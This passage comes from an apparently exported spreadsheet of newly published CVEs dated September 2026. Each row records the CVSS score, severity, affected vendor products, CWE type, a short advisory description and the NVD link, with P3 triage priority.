t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P697" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q697" s="5" t="inlineStr" /><c r="R697" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S697" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T697" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t></is></c></row><row r="698"><c r="A698" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B698" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C698" s="5" t="inlineStr"><is><t>CVE-2026-83990</t></is></c><c r="D698" s="5" t="n"><v>7.8</v></c><c r="E698" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F698" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G698" s="5" t="inlineStr" /><c r="H698" s="5" t="n"><v>0.003</v></c><c r="I698" s="5" t="inlineStr" /><c r="J698" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K698" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L698" s="5" t="inlineStr" /><c r="M698" s="5" t="inlineStr" /><c r="N698" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O698" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P698" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q698" s="5" t="inlineStr" /><c r="R698" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S698" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T698" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t></is></c></row><row r="699"><c r="A699" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B699" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C699" s="5" t="inlineStr"><is><t>CVE-2026-83995</t></is></c><c r="D699" s="5" t="n"><v>7.8</v></c><c r="E699" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F699" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G699" s="5" t="inlineStr" /><c r="H699" s="5" t="n"><v>0.003</v></c><c r="I699" s="5" t="inlineStr" /><c r="J699" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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99" s="5" t="inlineStr" /><c r="M699" s="5" t="inlineStr" /><c r="N699" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O699" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P699" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q699" s="5" t="inlineStr" /><c r="R699" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S699" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T699" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t></is></c></row><row r="700"><c r="A700" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B700" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C700" s="5" t="inlineStr"><is><t>CVE-2026-84000</t></is></c><c r="D700" s="5" t="n"><v>7.8</v></c><c r="E700" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F700" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G700" s="5" t="inlineStr" /><c r="H700" s="5" t="n"><v>0.003</v></c><c r="I700" s="5" t="inlineStr" /><c r="J700" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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00" s="5" t="inlineStr" /><c r="M700" s="5" t="inlineStr" /><c r="N700" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O700" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P700" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q700" s="5" t="inlineStr" /><c r="R700" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S700" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t></is></c><c r="T700" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t></is></c></row><row r="701"><c r="A701" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B701" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C701" s="5" t="inlineStr"><is><t>CVE-2026-85983</t></is></c><c r="D701" s="5" t="n"><v>7.8</v></c><c r="E701" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F701" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G701" s="5" t="inlineStr" /><c r="H701" s="5" t="n"><v>0.001</v></c><c r="I701" s="5" t="inlineStr" /><c r="J701" s="5" t="inlineStr" /><c r="K701" s="5" t="inlineStr" /><c r="L701" s="5" t="inlineStr" /><c r="M701" s="5" t="inlineStr" /><c r="N701" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O701" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P701" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q701" s="5" t="inlineStr" /><c r="R701" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S701" s="5" t="inlineStr"><is><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is></c><c r="T701" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t></is></c></row><row r="702"><c r="A702" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B702" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C702" s="5" t="inlineStr"><is><t>CVE-2026-9034</t></is></c><c r="D702" s="5" t="n"><v>7.8</v></c><c r="E702" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F702" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G702" s="5" t="inlineStr" /><c r="H702" s="5" t="n"><v>0.001</v></c><c r="I702" s="5" t="inlineStr" /><c r="J702" s="5" t="inlineStr" /><c r="K702" s="5" t="inlineStr" /><c r="L702" s="5" t="inlineStr" /><c r="M702" s="5" t="inlineStr" /><c r="N702" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O702" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P702" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q702" s="5" t="inlineStr" /><c r="R702" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S702" s="5" t="inlineStr"><is><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is></c><c r="T702" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t></is></c></row><row r="703"><c r="A703" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B703" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C703" s="5" t="inlineStr"><is><t>CVE-2026-19397</t></is></c><c r="D703" s="5" t="n"><v>7.7</v></c><c r="E703" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F703" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G703" s="5" t="inlineStr" /><c r="H703" s="5" t="n"><v>0.002</v></c><c r="I703" s="5" t="inlineStr" /><c r="J703" s="5" t="inlineStr" /><c r="K703" s="5" t="inlineStr" /><c r="L703" s="5" t="inlineStr" /><c r="M703" s="5" t="inlineStr" /><c r="N703" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O703" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P703" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q703" s="5" t="inlineStr" /><c r="R703" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S703" s="5" t="inlineStr"><is><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is></c><c r="T703" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t></is></c></row><row r="704"><c r="A704" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B704" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C704" s="5" t="inlineStr"><is><t>CVE-2026-66767</t></is></c><c r="D704" s="5" t="n"><v>7.7</v></c><c r="E704" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F704" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G704" s="5" t="inlineStr" /><c r="H704" s="5" t="n"><v>0.003</v></c><c r="I704" s="5" t="inlineStr" /><c r="J704" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K704" s="5" t="inlineStr" /><c r="L704" s="5" t="inlineStr" /><c r="M704" s="5" t="inlineStr" /><c r="N704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O704" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P704" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q704" s="5" t="inlineStr" /><c r="R704" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S704" s="5" t="inlineStr"><is><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is></c><c r="T704" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t></is></c></row><row r="705"><c r="A705" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B705" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C705" s="5" t="inlineStr"><is><t>CVE-2026-69683</t></is></c><c r="D705" s="5" t="n"><v>7.7</v></c><c r="E705" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G705" s="5" t="inlineStr" /><c r="H705" s="5" t="n"><v>0.008</v></c><c r="I705" s="5" t="inlineStr" /><c r="J705" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K705" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L705" s="5" t="inlineStr" /><c r="M705" s="5" t="inlineStr" /><c r="N705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O705" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P705" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q705" s="5" t="inlineStr" /><c r="R705" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S705" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T705" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t></is></c></row><row r="706"><c r="A706" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B706" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C706" s="5" t="inlineStr"><is><t>CVE-2026-73315</t></is></c><c r="D706" s="5" t="n"><v>7.7</v></c><c r="E706" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F706" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G706" s="5" t="inlineStr" /><c r="H706" s="5" t="n"><v>0.003</v></c><c r="I706" s="5" t="inlineStr" /><c r="J706" s="5" t="inlineStr" /><c r="K706" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L706" s="5" t="inlineStr" /><c r="M706" s="5" t="inlineStr" /><c r="N706" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O706" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P706" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q706" s="5" t="inlineStr" /><c r="R706" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S706" s="5" t="inlineStr"><is><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is></c><c r="T706" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t></is></c></row><row r="707"><c r="A707" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B707" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C707" s="5" t="inlineStr"><is><t>CVE-2026-77909</t></is></c><c r="D707" s="5" t="n"><v>7.7</v></c><c r="E707" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F707" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G707" s="5" t="inlineStr" /><c r="H707" s="5" t="n"><v>0.006</v></c><c r="I707" s="5" t="inlineStr" /><c r="J707" s="5" t="inlineStr" /><c r="K707" s="5" t="inlineStr" /><c r="L707" s="5" t="inlineStr" /><c r="M707" s="5" t="inlineStr" /><c r="N707" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q707" s="5" t="inlineStr" /><c r="R707" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S707" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t></is></c><c r="T707" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t></is></c></row><row r="708"><c r="A708" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B708" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C708" s="5" t="inlineStr"><is><t>CVE-2026-78623</t></is></c><c r="D708" s="5" t="n"><v>7.7</v></c><c r="E708" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F708" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G708" s="5" t="inlineStr" /><c r="H708" s="5" t="n"><v>0.002</v></c><c r="I708" s="5" t="inlineStr" /><c r="J708" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K708" s="5" t="inlineStr" /><c r="L708" s="5" t="inlineStr" /><c r="M708" s="5" t="inlineStr" /><c r="N708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O708" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P708" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q708" s="5" t="inlineStr" /><c r="R708" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S708" s="5" t="inlineStr"><is><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is></c><c r="T708" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t></is></c></row><row r="709"><c r="A709" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B709" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C709" s="5" t="inlineStr"><is><t>CVE-2026-82537</t></is></c><c r="D709" s="5" t="n"><v>7.7</v></c><c r="E709" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F709" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G709" s="5" t="inlineStr" /><c r="H709" s="5" t="n"><v>0.003</v></c><c r="I709" s="5" t="inlineStr" /><c r="J709" s="5" t="inlineStr" /><c r="K709" s="5" t="inlineStr" /><c r="L709" s="5" t="inlineStr" /><c r="M709" s="5" t="inlineStr" /><c r="N709" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O709" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P709" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q709" s="5" t="inlineStr" /><c r="R709" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S709" s="5" t="inlineStr"><is><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is></c><c r="T709" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t></is></c></row><row r="710"><c r="A710" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B710" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C710" s="5" t="inlineStr"><is><t>CVE-2026-9040</t></is></c><c r="D710" s="5" t="n"><v>7.7</v></c><c r="E710" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F710" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G710" s="5" t="inlineStr" /><c r="H710" s="5" t="n"><v>0.001</v></c><c r="I710" s="5" t="inlineStr" /><c r="J710" s="5" t="inlineStr" /><c r="K710" s="5" t="inlineStr" /><c r="L710" s="5" t="inlineStr" /><c r="M710" s="5" t="inlineStr" /><c r="N710" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O710" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P710" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q710" s="5" t="inlineStr" /><c r="R710" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S710" s="5" t="inlineStr"><is><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is></c><c r="T710" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t></is></c></row><row r="711"><c r="A711" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B711" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C711" s="5" t="inlineStr"><is><t>CVE-2026-77110</t></is></c><c r="D711" s="5" t="n"><v>7.6</v></c><c r="E711" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F711" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G711" s="5" t="inlineStr" /><c r="H711" s="5" t="n"><v>0.007</v></c><c r="I711" s="5" t="inlineStr" /><c r="J711" s="5" t="inlineStr" /><c r="K711" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L711" s="5" t="inlineStr" /><c r="M711" s="5" t="inlineStr" /><c r="N711" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O711" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P711" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q711" s="5" t="inlineStr" /><c r="R711" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S711" s="5" t="inlineStr"><is><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is></c><c r="T711" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t></is></c></row><row r="712"><c r="A712" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B712" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C712" s="5" t="inlineStr"><is><t>CVE-2026-82053</t></is></c><c r="D712" s="5" t="n"><v>7.6</v></c><c r="E712" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F712" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G712" s="5" t="inlineStr" /><c r="H712" s="5" t="n"><v>0.002</v></c><c r="I712" s="5" t="inlineStr" /><c r="J712" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K712" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L712" s="5" t="inlineStr" /><c r="M712" s="5" t="inlineStr" /><c r="N712" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O712" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P712" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q712" s="5" t="inlineStr" /><c r="R712" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S712" s="5" t="inlineStr"><is><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is></c><c r="T712" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t></is></c></row><row r="713"><c r="A713" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B713" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C713" s="5" t="inlineStr"><is><t>CVE-2026-86073</t></is></c><c r="D713" s="5" t="n"><v>7.6</v></c><c r="E713" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G713" s="5" t="inlineStr" /><c r="H713" s="5" t="n"><v>0.002</v></c><c r="I713" s="5" t="inlineStr" /><c r="J713" s="5" t="inlineStr" /><c r="K713" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L713" s="5" t="inlineStr" /><c r="M713" s="5" t="inlineStr" /><c r="N713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O713" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P713" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q713" s="5" t="inlineStr" /><c r="R713" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S713" s="5" t="inlineStr"><is><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is></c><c r="T713" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t></is></c></row><row r="714"><c r="A714" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B714" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C714" s="5" t="inlineStr"><is><t>CVE-2026-0860</t></is></c><c r="D714" s="5" t="n"><v>7.5</v></c><c r="E714" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F714" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G714" s="5" t="inlineStr" /><c r="H714" s="5" t="n"><v>0.002</v></c><c r="I714" s="5" t="inlineStr" /><c r="J714" s="5" t="inlineStr" /><c r="K714" s="5" t="inlineStr" /><c r="L714" s="5" t="inlineStr" /><c r="M714" s="5" t="inlineStr" /><c r="N714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O714" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P714" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q714" s="5" t="inlineStr" /><c r="R714" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S714" s="5" t="inlineStr"><is><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is></c><c r="T714" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t></is></c></row><row r="715"><c r="A715" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B715" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C715" s="5" t="inlineStr"><is><t>CVE-2026-16025</t></is></c><c r="D715" s="5" t="n"><v>7.5</v></c><c r="E715" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G715" s="5" t="inlineStr" /><c r="H715" s="5" t="n"><v>0.003</v></c><c r="I715" s="5" t="inlineStr" /><c r="J715" s="5" t="inlineStr" /><c r="K715" s="5" t="inlineStr" /><c r="L715" s="5" t="inlineStr" /><c r="M715" s="5" t="inlineStr" /><c r="N715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q715" s="5" t="inlineStr" /><c r="R715" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="S715" s="5" t="inlineStr"><is><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is></c><c r="T715" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t></is></c></row><row r="716"><c r="A716" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B716" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C716" s="5" t="inlineStr"><is><t>CVE-2026-16037</t></is></c><c r="D716" s="5" t="n"><v>7.5</v></c><c r="E716" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G716" s="5" t="inlineStr" /><c r="H716" s="5" t="n"><v>0.003</v></c><c r="I716" s="5" t="inlineStr" /><c r="J716" s="5" t="inlineStr" /><c r="K716" s="5" t="inlineStr" /><c r="L716" s="5" t="inlineStr" /><c r="M716" s="5" t="inlineStr" /><c r="N716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q716" s="5" t="inlineStr" /><c r="R716" s="5" t="inlineStr"><is><t>CWE-208</t></is></c><c r="S716" s="5" t="inlineStr"><is><t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="T716" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t></is></c></row><row r="717"><c r="A717" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B717" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C717" s="5" t="inlineStr"><is><t>CVE-2026-16497</t></is></c><c r="D717" s="5" t="n"><v>7.5</v></c><c r="E717" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F717" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G717" s="5" t="inlineStr" /><c r="H717" s="5" t="n"><v>0.004</v></c><c r="I717" s="5" t="inlineStr" /><c r="J717" s="5" t="inlineStr" /><c r="K717" s="5" t="inlineStr" /><c r="L717" s="5" t="inlineStr" /><c r="M717" s="5" t="inlineStr" /><c r="N717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q717" s="5" t="inlineStr" /><c r="R717" s="5" t="inlineStr"><is><t>CWE-834</t></is></c><c r="S717" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t></is></c><c r="T717" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t></is></c></row><row r="718"><c r="A718" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B718" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C718" s="5" t="inlineStr"><is><t>CVE-2026-28604</t></is></c><c r="D718" s="5" t="n"><v>7.5</v></c><c r="E718" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F718" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G718" s="5" t="inlineStr" /><c r="H718" s="5" t="n"><v>0.002</v></c><c r="I718" s="5" t="inlineStr" /><c r="J718" s="5" t="inlineStr" /><c r="K718" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L718" s="5" t="inlineStr" /><c r="M718" s="5" t="inlineStr" /><c r="N718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O718" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P718" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q718" s="5" t="inlineStr" /><c r="R718" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S718" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T718" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t></is></c></row><row r="719"><c r="A719" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B719" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C719" s="5" t="inlineStr"><is><t>CVE-2026-3174</t></is></c><c r="D719" s="5" t="n"><v>7.5</v></c><c r="E719" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F719" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G719" s="5" t="inlineStr" /><c r="H719" s="5" t="n"><v>0.003</v></c><c r="I719" s="5" t="inlineStr" /><c r="J719" s="5" t="inlineStr" /><c r="K719" s="5" t="inlineStr" /><c r="L719" s="5" t="inlineStr" /><c r="M719" s="5" t="inlineStr" /><c r="N719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O719" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P719" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q719" s="5" t="inlineStr" /><c r="R719" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S719" s="5" t="inlineStr"><is><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is></c><c r="T719" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t></is></c></row><row r="720"><c r="A720" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B720" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C720" s="5" t="inlineStr"><is><t>CVE-2026-47625</t></is></c><c r="D720" s="5" t="n"><v>7.5</v></c><c r="E720" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F720" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G720" s="5" t="inlineStr" /><c r="H720" s="5" t="n"><v>0.004</v></c><c r="I720" s="5" t="inlineStr" /><c r="J720" s="5" t="inlineStr" /><c r="K720" s="5" t="inlineStr" /><c r="L720" s="5" t="inlineStr" /><c r="M720" s="5" t="inlineStr" /><c r="N720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q720" s="5" t="inlineStr" /><c r="R720" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S720" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t></is></c><c r="T720" s="6" 